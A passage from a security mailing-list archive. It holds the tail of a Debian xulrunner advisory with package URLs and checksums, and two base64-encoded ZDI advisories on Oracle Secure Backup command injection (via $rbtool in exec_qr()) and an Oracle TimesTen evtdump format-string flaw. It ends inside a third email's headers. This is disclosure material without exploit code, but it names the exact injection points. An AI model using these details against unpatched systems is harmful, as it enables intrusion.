    Size/MD5 checksum:   118792 ebeeb6e0b3fa9697fc4d519dbf3445e3
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:    52882 9a492c7f088e33795f4f519e6d1fdb00
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:   785634 15195ea21bea73366c040ec35205b411
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:   305972 7c6cf13047b77819016441211306def6
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:   275352 7b73a4f8d7961a9e2e5be4a5edac6bb6

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   311370 dcc549b27be17ce12ad677571f7cd96c
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   775168 dc939366bb688b507d7f02e281f49ff9
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:    65310 08e712f2c7efc1ff4711a3fed99de972
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum: 46973282 628962bbf1d65f90cd45c289f4e57eb2
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   810170 3911108f3ad4ec7249de89579692a889
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:  3207248 c779f30b9617ce71eff5c7e38a50e700
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   350370 89f7abf6fe0374a40df224d17547a326
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   148354 e573866688369e0f33668e197ceb954a
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:    54152 137b9de7b7d101e6751448f9b376c542
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   125070 9f3c03fc4dcf3b92af90f6dbb028ec3b
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   641078 0d6cc0d69937519ec2a8b11c79620bba
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:  6113688 f14ea71428bbb9adc65fc9300af4dfaf
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   280116 934b5afcd4d54c8a9334209394725b76

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   757252 fbbf4aa51c254501839c5239898a1966
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   688966 eadd50708786aa35fe3352133362268a
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum: 46106184 f900f01b8a4d665783b488dba85e5368
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:  3183730 7570c50c80b825f39b21faae4304c39c
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:    54394 14206509134b8cab968b770409f2721d
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   283734 e8f93eadcfedd43817fdef860a9b18f2
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   900078 2fc17c17b2db9069640e5a5a8da4c55c
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   307054 fad889ae074b09fe590bb6d256cea5e1
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:    70250 83853ab4be095ccad382c53ecb31a2b8
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:  6818036 e8b4b094912ad1dc2eaa4246f4072b33
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   127826 35a3df9656c60848ee92ad37426f0e26
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   160986 51635e7052198336a4560f42a8534809
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   372762 44c448ce0bdd1fb906ce3fc0f1cae4db

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:  5691378 fb92fb8595fe77b778bf2f10cec49c59
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   720372 d6905da5cd02841a3a1504bc2414e6c0
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   119274 6ce21aa1465d61eab2441dea7e7dda47
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:    63586 04418e16def13078bdfb58e30864bec5
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:    51632 f4100de3c8fde3d8b45dc81af6a1d375
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   587454 7e843d8cbedddd2e158bbcceca21f109
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   677262 85da1319d7f5eb22a66c11947d3eb447
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:  2853912 6aaad890cf6475d08323566c1d45d3c6
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   137004 23c70ffb48e7fe2f77314a19a731435e
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   323878 c27c6e54a5f9bae01bec83548ade9ea9
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   260544 b3703da635436037b1cbed4cc04567d4
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   284548 afec3eadc60217b0f63bfd4efbb17a53
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum: 44808802 f7dd5d65267da83f9050a83d3131f953


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkluSlEACgkQXm3vHE4uylqaSQCdHEKoQIiWiXHOm48S2S3v6cHS
kiQAoMoAN/iBzrG1wqUSgCr4Vq3R6Gd7
=KctC
-----END PGP SIGNATURE-----

From - Wed Jan 14 16:42:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e8
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39180-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 62746EC6CC
for <lists@securityspace.com>; Wed, 14 Jan 2009 16:41:35 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3EA46236FF1; Wed, 14 Jan 2009 14:14:11 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10773 invoked from network); 14 Jan 2009 20:06:04 -0000
X-EDSINT-Source-Ip: 205.142.126.149
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-09-003: Oracle Secure Backup exec_qr() Command Injection Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF752E396B.80054323-ON8525753E.00704AC9-8625753E.0070942F@3com.com>
From: zdi-disclosures@3com.com
Date: Wed, 14 Jan 2009 14:29:40 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 01/14/2009 12:29:43 PM,
Serialize complete at 01/14/2009 12:29:43 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA5LTAwMzogT3JhY2xlIFNlY3VyZSBCYWNrdXAgZXhlY19xcigpIENvbW1hbmQgSW5qZWN0
aW9uIFZ1bG5lcmFiaWxpdHkNCmh0dHA6Ly93d3cuemVyb2RheWluaXRpYXRpdmUuY29tL2Fkdmlz
b3JpZXMvWkRJLTA5LTAwMw0KSmFudWFyeSAxNCwgMjAwOQ0KDQotLSBBZmZlY3RlZCBWZW5kb3Jz
Og0KT3JhY2xlDQoNCi0tIEFmZmVjdGVkIFByb2R1Y3RzOg0KT3JhY2xlIFNlY3VyZSBCYWNrdXAN
Cg0KLS0gVnVsbmVyYWJpbGl0eSBEZXRhaWxzOg0KVGhpcyB2dWxuZXJhYmlsaXR5IGFsbG93cyBy
ZW1vdGUgYXR0YWNrZXJzIHRvIGV4ZWN1dGUgYXJiaXRyYXJ5IGNvZGUgb24NCnZ1bG5lcmFibGUg
aW5zdGFsbGF0aW9ucyBvZiBPcmFjbGUgU2VjdXJlIEJhY2t1cC4gQXV0aGVudGljYXRpb24gaXMg
bm90DQpyZXF1aXJlZCB0byBleHBsb2l0IHRoaXMgdnVsbmVyYWJpbGl0eS4NCg0KVGhlIHNwZWNp
ZmljIGZsYXcgZXhpc3RzIHdpdGhpbiB0aGUgcm91dGluZSBleGVjX3FyKCkgZGVmaW5lZCBpbiB0
aGUgd2ViDQpzY3JpcHQgbG9naW4ucGhwLiBUaGUgdXNlci1zdXBwbGllZCB2YXJpYWJsZSAkcmJ0
b29sIGlzIGltcHJvcGVybHkNCnNhbml0aXplZCBhbmQgbGF0ZXIgcGFzc2VkIHRocm91Z2ggYSBj
YWxsIHRvIHBvcGVuKCksIHRoaXMgY2FuIHJlc3VsdCBpbg0KcmVtb3RlIHByZS1hdXRoZW50aWNh
dGlvbiBjb21tYW5kIGluamVjdGlvbi4NCg0KLS0gVmVuZG9yIFJlc3BvbnNlOg0KT3JhY2xlIGhh
cyBpc3N1ZWQgYW4gdXBkYXRlIHRvIGNvcnJlY3QgdGhpcyB2dWxuZXJhYmlsaXR5LiBNb3JlDQpk
ZXRhaWxzIGNhbiBiZSBmb3VuZCBhdDoNCg0KaHR0cDovL3d3dy5vcmFjbGUuY29tL3RlY2hub2xv
Z3kvZGVwbG95L3NlY3VyaXR5L2NyaXRpY2FsLXBhdGNoLXVwZGF0ZXMvY3B1amFuMjAwOS5odG1s
DQoNCi0tIERpc2Nsb3N1cmUgVGltZWxpbmU6DQoyMDA3LTA3LTEzIC0gVnVsbmVyYWJpbGl0eSBy
ZXBvcnRlZCB0byB2ZW5kb3INCjIwMDktMDEtMTQgLSBDb29yZGluYXRlZCBwdWJsaWMgcmVsZWFz
ZSBvZiBhZHZpc29yeQ0KDQotLSBDcmVkaXQ6DQpUaGlzIHZ1bG5lcmFiaWxpdHkgd2FzIGRpc2Nv
dmVyZWQgYnk6DQogICAgKiBKb3hlYW4gS29yZXQNCg0KLS0gQWJvdXQgdGhlIFplcm8gRGF5IElu
aXRpYXRpdmUgKFpESSk6DQpFc3RhYmxpc2hlZCBieSBUaXBwaW5nUG9pbnQsIFRoZSBaZXJvIERh
eSBJbml0aWF0aXZlIChaREkpIHJlcHJlc2VudHMgDQphIGJlc3Qtb2YtYnJlZWQgbW9kZWwgZm9y
IHJld2FyZGluZyBzZWN1cml0eSByZXNlYXJjaGVycyBmb3IgcmVzcG9uc2libHkNCmRpc2Nsb3Np
bmcgZGlzY292ZXJlZCB2dWxuZXJhYmlsaXRpZXMuDQoNClJlc2VhcmNoZXJzIGludGVyZXN0ZWQg
aW4gZ2V0dGluZyBwYWlkIGZvciB0aGVpciBzZWN1cml0eSByZXNlYXJjaA0KdGhyb3VnaCB0aGUg
WkRJIGNhbiBmaW5kIG1vcmUgaW5mb3JtYXRpb24gYW5kIHNpZ24tdXAgYXQ6DQoNCiAgICBodHRw
Oi8vd3d3Lnplcm9kYXlpbml0aWF0aXZlLmNvbQ0KDQpUaGUgWkRJIGlzIHVuaXF1ZSBpbiBob3cg
dGhlIGFjcXVpcmVkIHZ1bG5lcmFiaWxpdHkgaW5mb3JtYXRpb24gaXMNCnVzZWQuIFRpcHBpbmdQ
b2ludCBkb2VzIG5vdCByZS1zZWxsIHRoZSB2dWxuZXJhYmlsaXR5IGRldGFpbHMgb3IgYW55DQpl
eHBsb2l0IGNvZGUuIEluc3RlYWQsIHVwb24gbm90aWZ5aW5nIHRoZSBhZmZlY3RlZCBwcm9kdWN0
IHZlbmRvciwNClRpcHBpbmdQb2ludCBwcm92aWRlcyBpdHMgY3VzdG9tZXJzIHdpdGggemVybyBk
YXkgcHJvdGVjdGlvbiB0aHJvdWdoDQppdHMgaW50cnVzaW9uIHByZXZlbnRpb24gdGVjaG5vbG9n
eS4gRXhwbGljaXQgZGV0YWlscyByZWdhcmRpbmcgdGhlDQpzcGVjaWZpY3Mgb2YgdGhlIHZ1bG5l
cmFiaWxpdHkgYXJlIG5vdCBleHBvc2VkIHRvIGFueSBwYXJ0aWVzIHVudGlsDQphbiBvZmZpY2lh
bCB2ZW5kb3IgcGF0Y2ggaXMgcHVibGljbHkgYXZhaWxhYmxlLiBGdXJ0aGVybW9yZSwgd2l0aCB0
aGUNCmFsdHJ1aXN0aWMgYWltIG9mIGhlbHBpbmcgdG8gc2VjdXJlIGEgYnJvYWRlciB1c2VyIGJh
c2UsIFRpcHBpbmdQb2ludA0KcHJvdmlkZXMgdGhpcyB2dWxuZXJhYmlsaXR5IGluZm9ybWF0aW9u
IGNvbmZpZGVudGlhbGx5IHRvIHNlY3VyaXR5DQp2ZW5kb3JzIChpbmNsdWRpbmcgY29tcGV0aXRv
cnMpIHdobyBoYXZlIGEgdnVsbmVyYWJpbGl0eSBwcm90ZWN0aW9uIG9yDQptaXRpZ2F0aW9uIHBy
b2R1Y3QuDQoNCk91ciB2dWxuZXJhYmlsaXR5IGRpc2Nsb3N1cmUgcG9saWN5IGlzIGF2YWlsYWJs
ZSBvbmxpbmUgYXQ6DQoNCiAgICBodHRwOi8vd3d3Lnplcm9kYXlpbml0aWF0aXZlLmNvbS9hZHZp
c29yaWVzL2Rpc2Nsb3N1cmVfcG9saWN5Lw0KDQpDT05GSURFTlRJQUxJVFkgTk9USUNFOiBUaGlz
IGUtbWFpbCBtZXNzYWdlLCBpbmNsdWRpbmcgYW55IGF0dGFjaG1lbnRzLA0KaXMgYmVpbmcgc2Vu
dCBieSAzQ29tIGZvciB0aGUgc29sZSB1c2Ugb2YgdGhlIGludGVuZGVkIHJlY2lwaWVudChzKSBh
bmQNCm1heSBjb250YWluIGNvbmZpZGVudGlhbCwgcHJvcHJpZXRhcnkgYW5kL29yIHByaXZpbGVn
ZWQgaW5mb3JtYXRpb24uDQpBbnkgdW5hdXRob3JpemVkIHJldmlldywgdXNlLCBkaXNjbG9zdXJl
IGFuZC9vciBkaXN0cmlidXRpb24gYnkgYW55IA0KcmVjaXBpZW50IGlzIHByb2hpYml0ZWQuICBJ
ZiB5b3UgYXJlIG5vdCB0aGUgaW50ZW5kZWQgcmVjaXBpZW50LCBwbGVhc2UNCmRlbGV0ZSBhbmQv
b3IgZGVzdHJveSBhbGwgY29waWVzIG9mIHRoaXMgbWVzc2FnZSByZWdhcmRsZXNzIG9mIGZvcm0g
YW5kDQphbnkgaW5jbHVkZWQgYXR0YWNobWVudHMgYW5kIG5vdGlmeSAzQ29tIGltbWVkaWF0ZWx5
IGJ5IGNvbnRhY3RpbmcgdGhlDQpzZW5kZXIgdmlhIHJlcGx5IGUtbWFpbCBvciBmb3J3YXJkaW5n
IHRvIDNDb20gYXQgcG9zdG1hc3RlckAzY29tLmNvbS4gDQo
From - Wed Jan 14 16:52:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e9
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39181-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 75C52EC88D
for <lists@securityspace.com>; Wed, 14 Jan 2009 16:51:29 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 5152A237271; Wed, 14 Jan 2009 14:14:46 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10809 invoked from network); 14 Jan 2009 20:06:31 -0000
X-EDSINT-Source-Ip: 205.142.126.149
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-09-004: Oracle TimesTen evtdump Remote Format String Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OFEDF225A6.227226D0-ON8525753E.00704BCC-8625753E.00709C2A@3com.com>
From: zdi-disclosures@3com.com
Date: Wed, 14 Jan 2009 14:30:01 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 01/14/2009 12:30:04 PM,
Serialize complete at 01/14/2009 12:30:04 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA5LTAwNDogT3JhY2xlIFRpbWVzVGVuIGV2dGR1bXAgUmVtb3RlIEZvcm1hdCBTdHJpbmcg
VnVsbmVyYWJpbGl0eQ0KaHR0cDovL3d3dy56ZXJvZGF5aW5pdGlhdGl2ZS5jb20vYWR2aXNvcmll
cy9aREktMDktMDA0DQpKYW51YXJ5IDE0LCAyMDA5DQoNCi0tIEFmZmVjdGVkIFZlbmRvcnM6DQpP
cmFjbGUNCg0KLS0gQWZmZWN0ZWQgUHJvZHVjdHM6DQpPcmFjbGUgVGltZXNUZW4NCg0KLS0gVGlw
cGluZ1BvaW50KFRNKSBJUFMgQ3VzdG9tZXIgUHJvdGVjdGlvbjoNClRpcHBpbmdQb2ludCBJUFMg
Y3VzdG9tZXJzIGhhdmUgYmVlbiBwcm90ZWN0ZWQgYWdhaW5zdCB0aGlzDQp2dWxuZXJhYmlsaXR5
IGJ5IERpZ2l0YWwgVmFjY2luZSBwcm90ZWN0aW9uIGZpbHRlciBJRCA2MDUyLiANCkZvciBmdXJ0
aGVyIHByb2R1Y3QgaW5mb3JtYXRpb24gb24gdGhlIFRpcHBpbmdQb2ludCBJUFMsIHZpc2l0Og0K
DQogICAgaHR0cDovL3d3dy50aXBwaW5ncG9pbnQuY29tDQoNCi0tIFZ1bG5lcmFiaWxpdHkgRGV0
YWlsczoNClRoaXMgdnVsbmVyYWJpbGl0eSBhbGxvd3MgcmVtb3RlIGF0dGFja2VycyB0byBleGVj
dXRlIGFyYml0cmFyeSBjb2RlIG9uDQp2dWxuZXJhYmxlIGluc3RhbGxhdGlvbnMgb2YgT3JhY2xl
IFRpbWVzVGVuLiBVc2VyIGludGVyYWN0aW9uIGlzIG5vdA0KcmVxdWlyZWQgdG8gZXhwbG9pdCB0
aGlzIHZ1bG5lcmFiaWxpdHkuDQoNClRoZSBzcGVjaWZpYyBmbGF3IGV4aXN0cyBpbiB0aGUgZXZ0
ZHVtcCBDR0kgbW9kdWxlLCB3aGljaCBpcyB1c2VkIHRvDQp3cml0ZSB0byBhbiBpbnRlcm5hbCBs
b2cgZmlsZS4gVGhlIHBhcmFtZXRlciAnbXNnJyBkb2VzIG5vdCBwcm9wZXJseQ0Kc2FuaXRpemUg
Zm9ybWF0IHN0cmluZyB0b2tlbnMgYW5kIGNhbiBiZSBleHBsb2l0ZWQgdG8gZXhlY3V0ZSBhcmJp
dHJhcnkNCmNvZGUuDQoNCi0tIFZlbmRvciBSZXNwb25zZToNCk9yYWNsZSBoYXMgaXNzdWVkIGFu
IHVwZGF0ZSB0byBjb3JyZWN0IHRoaXMgdnVsbmVyYWJpbGl0eS4gTW9yZQ0KZGV0YWlscyBjYW4g
YmUgZm91bmQgYXQ6DQoNCmh0dHA6Ly93d3cub3JhY2xlLmNvbS90ZWNobm9sb2d5L2RlcGxveS9z
ZWN1cml0eS9jcml0aWNhbC1wYXRjaC11cGRhdGVzL2NwdWphbjIwMDkuaHRtbA0KDQotLSBEaXNj
bG9zdXJlIFRpbWVsaW5lOg0KMjAwOC0wNC0wNyAtIFZ1bG5lcmFiaWxpdHkgcmVwb3J0ZWQgdG8g
dmVuZG9yDQoyMDA5LTAxLTE0IC0gQ29vcmRpbmF0ZWQgcHVibGljIHJlbGVhc2Ugb2YgYWR2aXNv
cnkNCg0KLS0gQ3JlZGl0Og0KVGhpcyB2dWxuZXJhYmlsaXR5IHdhcyBkaXNjb3ZlcmVkIGJ5Og0K
ICAgICogSm94ZWFuIEtvcmV0DQoNCi0tIEFib3V0IHRoZSBaZXJvIERheSBJbml0aWF0aXZlICha
REkpOg0KRXN0YWJsaXNoZWQgYnkgVGlwcGluZ1BvaW50LCBUaGUgWmVybyBEYXkgSW5pdGlhdGl2
ZSAoWkRJKSByZXByZXNlbnRzIA0KYSBiZXN0LW9mLWJyZWVkIG1vZGVsIGZvciByZXdhcmRpbmcg
c2VjdXJpdHkgcmVzZWFyY2hlcnMgZm9yIHJlc3BvbnNpYmx5DQpkaXNjbG9zaW5nIGRpc2NvdmVy
ZWQgdnVsbmVyYWJpbGl0aWVzLg0KDQpSZXNlYXJjaGVycyBpbnRlcmVzdGVkIGluIGdldHRpbmcg
cGFpZCBmb3IgdGhlaXIgc2VjdXJpdHkgcmVzZWFyY2gNCnRocm91Z2ggdGhlIFpESSBjYW4gZmlu
ZCBtb3JlIGluZm9ybWF0aW9uIGFuZCBzaWduLXVwIGF0Og0KDQogICAgaHR0cDovL3d3dy56ZXJv
ZGF5aW5pdGlhdGl2ZS5jb20NCg0KVGhlIFpESSBpcyB1bmlxdWUgaW4gaG93IHRoZSBhY3F1aXJl
ZCB2dWxuZXJhYmlsaXR5IGluZm9ybWF0aW9uIGlzDQp1c2VkLiBUaXBwaW5nUG9pbnQgZG9lcyBu
b3QgcmUtc2VsbCB0aGUgdnVsbmVyYWJpbGl0eSBkZXRhaWxzIG9yIGFueQ0KZXhwbG9pdCBjb2Rl
LiBJbnN0ZWFkLCB1cG9uIG5vdGlmeWluZyB0aGUgYWZmZWN0ZWQgcHJvZHVjdCB2ZW5kb3IsDQpU
aXBwaW5nUG9pbnQgcHJvdmlkZXMgaXRzIGN1c3RvbWVycyB3aXRoIHplcm8gZGF5IHByb3RlY3Rp
b24gdGhyb3VnaA0KaXRzIGludHJ1c2lvbiBwcmV2ZW50aW9uIHRlY2hub2xvZ3kuIEV4cGxpY2l0
IGRldGFpbHMgcmVnYXJkaW5nIHRoZQ0Kc3BlY2lmaWNzIG9mIHRoZSB2dWxuZXJhYmlsaXR5IGFy
ZSBub3QgZXhwb3NlZCB0byBhbnkgcGFydGllcyB1bnRpbA0KYW4gb2ZmaWNpYWwgdmVuZG9yIHBh
dGNoIGlzIHB1YmxpY2x5IGF2YWlsYWJsZS4gRnVydGhlcm1vcmUsIHdpdGggdGhlDQphbHRydWlz
dGljIGFpbSBvZiBoZWxwaW5nIHRvIHNlY3VyZSBhIGJyb2FkZXIgdXNlciBiYXNlLCBUaXBwaW5n
UG9pbnQNCnByb3ZpZGVzIHRoaXMgdnVsbmVyYWJpbGl0eSBpbmZvcm1hdGlvbiBjb25maWRlbnRp
YWxseSB0byBzZWN1cml0eQ0KdmVuZG9ycyAoaW5jbHVkaW5nIGNvbXBldGl0b3JzKSB3aG8gaGF2
ZSBhIHZ1bG5lcmFiaWxpdHkgcHJvdGVjdGlvbiBvcg0KbWl0aWdhdGlvbiBwcm9kdWN0Lg0KDQpP
dXIgdnVsbmVyYWJpbGl0eSBkaXNjbG9zdXJlIHBvbGljeSBpcyBhdmFpbGFibGUgb25saW5lIGF0
Og0KDQogICAgaHR0cDovL3d3dy56ZXJvZGF5aW5pdGlhdGl2ZS5jb20vYWR2aXNvcmllcy9kaXNj
bG9zdXJlX3BvbGljeS8NCg0KQ09ORklERU5USUFMSVRZIE5PVElDRTogVGhpcyBlLW1haWwgbWVz
c2FnZSwgaW5jbHVkaW5nIGFueSBhdHRhY2htZW50cywNCmlzIGJlaW5nIHNlbnQgYnkgM0NvbSBm
b3IgdGhlIHNvbGUgdXNlIG9mIHRoZSBpbnRlbmRlZCByZWNpcGllbnQocykgYW5kDQptYXkgY29u
dGFpbiBjb25maWRlbnRpYWwsIHByb3ByaWV0YXJ5IGFuZC9vciBwcml2aWxlZ2VkIGluZm9ybWF0
aW9uLg0KQW55IHVuYXV0aG9yaXplZCByZXZpZXcsIHVzZSwgZGlzY2xvc3VyZSBhbmQvb3IgZGlz
dHJpYnV0aW9uIGJ5IGFueSANCnJlY2lwaWVudCBpcyBwcm9oaWJpdGVkLiAgSWYgeW91IGFyZSBu
b3QgdGhlIGludGVuZGVkIHJlY2lwaWVudCwgcGxlYXNlDQpkZWxldGUgYW5kL29yIGRlc3Ryb3kg
YWxsIGNvcGllcyBvZiB0aGlzIG1lc3NhZ2UgcmVnYXJkbGVzcyBvZiBmb3JtIGFuZA0KYW55IGlu
Y2x1ZGVkIGF0dGFjaG1lbnRzIGFuZCBub3RpZnkgM0NvbSBpbW1lZGlhdGVseSBieSBjb250YWN0
aW5nIHRoZQ0Kc2VuZGVyIHZpYSByZXBseSBlLW1haWwgb3IgZm9yd2FyZGluZyB0byAzQ29tIGF0
IHBvc3RtYXN0ZXJAM2NvbS5jb20uIA0K

From - Wed Jan 14 17:02:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058ea
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39182-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 8E00BEC8E8
